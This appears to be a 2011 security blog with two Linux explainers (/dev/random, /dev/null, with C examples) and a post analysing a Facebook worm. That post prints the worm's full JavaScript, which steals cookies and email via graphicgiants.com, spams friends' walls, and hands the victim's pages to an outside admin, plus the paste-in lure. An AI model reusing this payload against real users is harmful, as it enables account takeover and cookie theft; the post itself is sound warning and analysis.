Sec Alert!

January 6, 2011

If it’s random be it /dev/random!

Filed under: Linux, Unix — Rahil @ 4:07 PM

In this geeky life, everyone has heard of that notorious thing known as the Random Number. Initially, when I had to find a random number, I used to google some cool tool or website which could give me a random number. But, after a while, I came to know a cool thing called /dev/random and /dev/urandom. Basically, these are the devices (files) on Linux systems that provide the user with random numbers.

/dev/random and /dev/urandom are two read-only device files on a Linux system; reading from them gives the user random numbers. /dev/random generates higher-quality random numbers than /dev/urandom. The following sample code illustrates how to use these device files to generate a random number.

#include <stdio.h>
#include <fcntl.h>    /* open(), O_RDONLY */
#include <unistd.h>   /* read(), close() */

int main(void)
{
        int fd;
        long randNo;

        /* open() takes integer flags, not a stdio mode string like "r" */
        fd = open("/dev/random", O_RDONLY);
        if (fd < 0) { perror("open"); return 1; }

        /* read() may return fewer bytes than asked for; treat that as failure */
        if (read(fd, &randNo, sizeof(randNo)) != (ssize_t)sizeof(randNo)) {
                perror("read"); close(fd); return 1;
        }
        printf("%ld\n", randNo);
        close(fd);
        return 0;
}

Basically, /dev/random is an interface for the user to access the kernel’s random number generator. The system internally collects environmental and device-driver noise in the form of bits and gathers it in the entropy pool. This way the system generates high-quality (true) random numbers which can be used for various purposes. Also, as a random number read from /dev/random is generated from the entropy pool, a read from /dev/random will block until sufficient noise is available to generate the random number.

Opposed to that, /dev/urandom generates the random number with whatever amount of noise is available in the pool. Random numbers generated this way may or may not be truly random and may be vulnerable to cryptographic attack.
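As an added example that is not part of the original post, the following C code reads the two devices the way a careful program should: the read() loop handles short reads and signal interruptions that the sample above ignores, and an optional O_NONBLOCK flag turns the blocking behaviour of /dev/random described above into an EAGAIN error the caller can handle instead of a stalled process. The device paths are the standard Linux ones; the function names are mine.

```c
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Read exactly n bytes from a random device into buf, retrying on short
 * reads and on EINTR.  Returns 0 on success, -1 on error with errno set.
 * With nonblock != 0 the device is opened O_NONBLOCK, so a read that would
 * otherwise block (pool empty) fails with EAGAIN instead of stalling. */
int read_random_device(const char *path, void *buf, size_t n, int nonblock)
{
    int fd = open(path, O_RDONLY | (nonblock ? O_NONBLOCK : 0));
    if (fd < 0)
        return -1;

    unsigned char *p = buf;
    size_t got = 0;
    while (got < n) {
        ssize_t r = read(fd, p + got, n - got);
        if (r == 0) {                 /* unexpected EOF from a device */
            errno = EIO;
            r = -1;
        }
        if (r < 0) {
            if (errno == EINTR)       /* interrupted by a signal: retry */
                continue;
            int saved = errno;        /* close() must not clobber errno */
            close(fd);
            errno = saved;
            return -1;
        }
        got += (size_t)r;
    }
    close(fd);
    return 0;
}

/* Sanity check: two 32-byte draws from /dev/urandom must differ.  Returns 1
 * if they do, 0 if they are identical (a broken generator), -1 on error. */
int urandom_draws_differ(void)
{
    unsigned char a[32], b[32];
    if (read_random_device("/dev/urandom", a, sizeof a, 0) != 0)
        return -1;
    if (read_random_device("/dev/urandom", b, sizeof b, 0) != 0)
        return -1;
    return memcmp(a, b, sizeof a) != 0;
}
```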

More information on configuration and usage can be found at linux.die.net or with the command man random.

January 2, 2011

What the hell is /dev/null in Linux?!

Filed under: Linux, Unix — Rahil @ 8:22 PM

One day I was searching for a specific type of file on my Linux machine. Initially I was so enthusiastic that I tried for almost 10 minutes and that also on console (CLI)!! But, still I could not find what I wanted! So I thought “That is it! Now, I need to automate the search and decided to write a SHELL SCRIPT!” While I was writing it, I came across a situation where I needed my command to process the data but not to show it on console. So, I searched a little here and a lot there and finally came up with a golden solution called Null Device.

In Linux (and other Unix-like systems), there are three types of standard streams.

    Standard Input [ StdIn-0 ] – An input stream ( Mostly Keyboard )
    Standard Output [ StdOut-1 ] – An output stream ( Mostly Monitor )
    Standard Error [ StdErr-2 ] – An error stream ( Mostly, Monitor )

Linux offers a very useful feature called stream redirection, i.e. we can redirect any of the standard streams to some other place to accomplish a specific task. Now, sometimes we do not wish to write some output/error to the screen but also do not wish to log it into a file – we simply want to discard it. That is when /dev/null comes in handy.

It is a special file/device with the nature “write once, forget forever”. It means that whatever is written to that file is instantly discarded into the void. So, redirecting a stream to /dev/null leaves no trace of any output.

dosomething 2>/dev/null will discard the errors and nothing will be shown on screen.
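An added example (not from the original post) showing in C what the shell does behind dosomething 2>/dev/null: the null device is opened for writing and spliced over file descriptor 2 with dup2(), and the kernel happily reports every byte as written. It goes one step beyond the post by also showing the read side: reading /dev/null yields end-of-file immediately. Function names are mine.

```c
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* What the shell does for "cmd 2>/dev/null": open the null device for
 * writing and splice it over descriptor 2 (stderr) with dup2().  Returns a
 * duplicate of the original stderr so the caller can restore it, or -1. */
int silence_stderr(void)
{
    int saved = dup(STDERR_FILENO);
    int devnull = open("/dev/null", O_WRONLY);
    if (saved < 0 || devnull < 0 || dup2(devnull, STDERR_FILENO) < 0) {
        if (saved >= 0) close(saved);
        if (devnull >= 0) close(devnull);
        return -1;
    }
    close(devnull);     /* fd 2 now refers to /dev/null on its own */
    return saved;
}

/* Write a message to stderr while it points at /dev/null, then put the
 * original stderr back.  The kernel reports every byte as written even
 * though nothing is stored; returns that count, or -1 on setup failure. */
long bytes_sent_to_void(const char *msg)
{
    int saved = silence_stderr();
    if (saved < 0)
        return -1;
    ssize_t n = write(STDERR_FILENO, msg, strlen(msg));
    dup2(saved, STDERR_FILENO);   /* restore the real stderr for the rest */
    close(saved);
    return (long)n;
}

/* The other direction: reading /dev/null gives end-of-file at once, which
 * is why "cmd </dev/null" makes cmd see empty input.  Returns 1 if so. */
int devnull_reads_as_eof(void)
{
    char buf[16];
    int fd = open("/dev/null", O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, sizeof buf);
    close(fd);
    return n == 0;
}
```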

It is quite similar to the NUL device of DOS/Windows and \Device\Null of Windows NT.

November 22, 2010

Revolving Images or Revolving Spam at facebook!?!

Filed under: Attacks, Script Attacks — Rahil @ 10:26 AM

One wonderful day your friend sends you a message “Hey! Checkout this cool link! It bounces all images on your ‘boring’ facebook page.” WoW! So cool, na!

That’s the case right now. On one of my friend’s pages I saw text saying

Really cool Facebook revolving images. MUST SEE http://rotatingimage.tk/

I first went to the URL rotatingimage.tk and found a JavaScript snippet which the author asked visitors to run in the address bar at the top of the browser. It looked something like —

javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)

Then I got a little curious and tried to play with it a little. I tried to open the script’s source URL shown above directly in the browser and landed on the Facebook.com page. So, I decided to go further. I enabled the HTTP header checker, requested the same URL again and noticed that the web server was responding with a 302 TEMPORARILY MOVED response code. That really drove me nuts, so I used the Linux tool curl. Now, instead of getting nothing, I got a file with the JavaScript shown below —

txt = "Really cool Facebook revolving images. MUST SEE http://rotatingimage.tk";
txtee = "Really cool Facebook revolving images. MUST SEE http://revolvingimage.tk";

alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");


with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {

    if (x.readyState == 4 && x.status == 200) {


        comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
        form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
        pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        appid = "150622878317085";
        appname = "rip_m_j";

        with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () {



            if (xx.readyState == 4 && xx.status == 200) {
                m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
                i = 0;
llimit=25;
                t = setInterval(function () {
                    if (i >= llimit ) return;
if(i == 0)
{


with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length;
pplp=0;
for(pplp=0;pplp<aaac;pplp++)
{

with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[pplp].replace(/\\"id\\":/i, "")+"&sk=admin"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[pplp].replace(/\\"id\\":/i, "")+"&friendselector_input%5B%5D=nandu.oug%40gmail.com%09&friend_selected%5B%5D=&save=1");


}


}}, send(null);

with(xxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function(){ if(xxx.readyState == 4 && xxx.status == 200){ with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":"  + (d = xxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }}, send(null);

with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("fbpage_id=133631350023549&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");

}
else if (i == llimit - 1)
{
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function(){ if(xxxx.readyState == 4 && xxxx.status == 200){ with(s = document.createElement("script")) src = "http://graphicgiants.com/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":"  + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }}, send(null);
}

if(i%2==0)
{
                    with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else 
{
                    with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}

                    i += 1;
                }, 2000);
            }



        }, send(null);
    }
}, send(null);

As far as I have understood —

In the script, there are calls to an external domain on lines 39 and 48 (the two requests that load a script from graphicgiants.com with document.cookie appended to the URL), which receive your Facebook cookie. When you run a script in the browser this way, it runs in the security context of Facebook.com and the browser will not stop that request. This way an attacker may compromise your account and your privacy. Though it may be harmless, it is surely fishy. I would suggest not running such a script within your browser when you are logged into your Facebook account.

If you are affected or see it somewhere, you can report it here:

http://www.facebook.com/help/contact.php?show_form=report_phishing

Click here to read more from Shubhanshu Mishra’s blog.
